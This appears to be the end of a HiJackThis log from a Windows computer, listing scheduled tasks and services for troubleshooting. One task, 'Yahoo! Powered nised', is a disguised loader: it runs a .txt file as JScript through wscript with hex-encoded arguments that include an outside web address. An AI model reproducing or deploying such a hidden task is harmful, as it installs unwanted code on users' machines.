O22 - Tasks_Migrated: \Microsoft\Windows\TabletPC\InputPersonalization - C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe (Microsoft)
O22 - Tasks_Migrated: \Microsoft\Windows\Tcpip\IpAddressConflict1 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (Microsoft)
O22 - Tasks_Migrated: \Microsoft\Windows\Tcpip\IpAddressConflict2 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (Microsoft)
O22 - Tasks_Migrated: {085E5AE1-682E-4941-8059-CC6CEDDE3C29} - C:\WINDOWS\system32\pcalua.exe -a "C:\Users\mf\Downloads\eMule0.50a-Installer (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {12BD7B1A-6388-4013-8AC1-1883FE47F70D} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.7.59.102/it/abandoninstall?page=tsProgressBar (file missing)
O22 - Tasks_Migrated: {3C468AAC-74FF-4747-B9D1-910275B1F460} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (1).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {595F7578-6091-4104-8C2C-3638A55FCA14} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.7.0.102&LastError=12002 (file missing)
O22 - Tasks_Migrated: {865AE5AF-4CD1-4557-B379-1514C9E2B671} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (5).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {9783570B-C119-497B-9666-089FCACD6DAA} - C:\Windows\system32\pcalua.exe -a C:\Users\mf\Desktop\HiJackThis.exe -d C:\Users\mf\Desktop
O22 - Tasks_Migrated: {B618187F-895E-4717-A6A2-8CBAD7BF869E} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.6.0.106/it/abandoninstall?source=lightinstaller&page=tsInstall (file missing)
O22 - Tasks_Migrated: {C6509AC9-3829-4877-9816-6D7412C5D865} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {F77EE82F-C7C7-45A3-8AF5-781029F12F97} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.11.0.102&LastError=12002 (file missing)
O22 - Tasks_Migrated: Adobe Flash Player NPAPI Notifier - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_414_Plugin.exe -check plugin (file missing)
O22 - Tasks_Migrated: Adobe Flash Player PPAPI Notifier - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_414_pepper.exe -check pepperplugin (file missing)
O22 - Tasks_Migrated: Adobe Flash Player Updater - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (file missing)
O22 - Tasks_Migrated: ATKOSD2 - C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
O22 - Tasks_Migrated: Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
O22 - Tasks_Migrated: Avast Secure Browser Heartbeat Task (Hourly) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --hourly
O22 - Tasks_Migrated: Avast Secure Browser Heartbeat Task (Logon) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --logon
O22 - Tasks_Migrated: avastBCLRestartS-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (file missing)
O22 - Tasks_Migrated: AvastUpdateTaskMachineCore - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /c
O22 - Tasks_Migrated: AvastUpdateTaskMachineUA - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /ua /installsource scheduler
O22 - Tasks_Migrated: ByteFence - C:\Program Files\ByteFence\ByteFence.exe /a (file missing)
O22 - Tasks_Migrated: CCleaner Update - C:\Program Files\CCleaner\CCUpdate.exe
O22 - Tasks_Migrated: CCleanerSkipUAC - C:\Program Files\CCleaner\CCleaner.exe $(Arg0)
O22 - Tasks_Migrated: Digital Sites - C:\Users\mf\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE /Check (file missing)
O22 - Tasks_Migrated: GarminUpdaterTask - C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe
O22 - Tasks_Migrated: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Tasks_Migrated: ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller scheduler-impersonate
O22 - Tasks_Migrated: LaunchSignup - C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe frompopup (file missing)
O22 - Tasks_Migrated: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe (file missing)
O22 - Tasks_Migrated: Yahoo! Powered nised - C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{7015B576-FA57-3FB0-7C91-A1F2E6D32A3C}\timo.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c726f6465646f" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c7261726f6c6963" "//B" "//E:jscript" "--IsErIk"
O23 - Service R2: AFBAgent - C:\WINDOWS\system32\FBAgent.exe
O23 - Service R2: Application Virtualization Client - (sftlist) - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
O23 - Service R2: Avast Antivirus - (avast! Antivirus) - C:\Program Files\AVAST Software\Avast\AvastSvc.exe /runassvc
O23 - Service R2: Avast Tools - (avast! Tools) - C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe /runassvc
O23 - Service R2: AvastWscReporter - C:\Program Files\AVAST Software\Avast\wsc_proxy.exe /runassvc /rpcserver
O23 - Service R2: Client Virtualization Handler - (cvhsvc) - C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
O23 - Service R3: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R3: ASLDR Service - (ASLDRService) - C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
O23 - Service R3: ASUS InstantOn Service - (ASUS InstantOn) - C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe
O23 - Service R3: aswbIDSAgent - C:\Program Files\AVAST Software\Avast\aswidsagent.exe
O23 - Service R3: ATKGFNEX Service - (ATKGFNEXSrv) - C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
O23 - Service R3: BBUpdate - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.exe
O23 - Service R3: CCleaner Performance Optimizer Service - (CCleanerPerformanceOptimizerService) - C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
O23 - Service R3: Cyclone License Server - (CycloneLicenseServer) - C:\Program Files (x86)\Leica Geosystems\Cyclone\CyraLicense.exe "C:\Program Files (x86)\Leica Geosystems\Cyclone\"
O23 - Service R3: Intel(R) Capability Licensing Service Interface - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service R3: Intel(R) Dynamic Application Loader Host Interface Service - (jhi_service) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service R3: Intel(R) HD Graphics Control Panel Service - (igfxCUIService1.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R3: Intel(R) Management and Security Application Local Management Service - (LMS) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service R3: Intel(R) Management and Security Application User Notification Service - (UNS) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service R3: Intel(R) ME Service - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
O23 - Service R3: Leica HDS Server - C:\Program Files (x86)\Leica Geosystems\Cyclone\fastobjectsserver.exe -config "C:\Program Files (x86)\Leica Geosystems\Cyclone\ptserver.cfg"
O23 - Service S2: BingBar Service - (BBSvc) - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.exe
O23 - Service S2: Garmin Device Interaction Service - C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe EXPRESS
O23 - Service S2: Servizio %1!s! Update (avast) - (avast) - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /svc
O23 - Service S2: Servizio di Google Updater (GoogleUpdaterService132.0.6833.0) - (GoogleUpdaterService132.0.6833.0) - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --system --windows-service --service=update
O23 - Service S2: Servizio interno di Google Updater (GoogleUpdaterInternalService132.0.6833.0) - (GoogleUpdaterInternalService132.0.6833.0) - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --system --windows-service --service=update-internal
O23 - Service S3: Avast Secure Browser Elevation Service (AvastSecureBrowserElevationService) - (AvastSecureBrowserElevationService) - C:\Program Files (x86)\AVAST Software\Browser\Application\131.0.27624.87\elevation_service.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\131.0.6778.109\elevation_service.exe
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: NVIDIA Update Service Daemon - (nvUpdatusService) - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
O23 - Service S3: Servizio %1!s! Update (avastm) - (avastm) - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /medsvc


--
End of file - Time spent: 91,3 sec. - 109236 bytes, CRC32: FFFFFFFF. Sign: 픻럮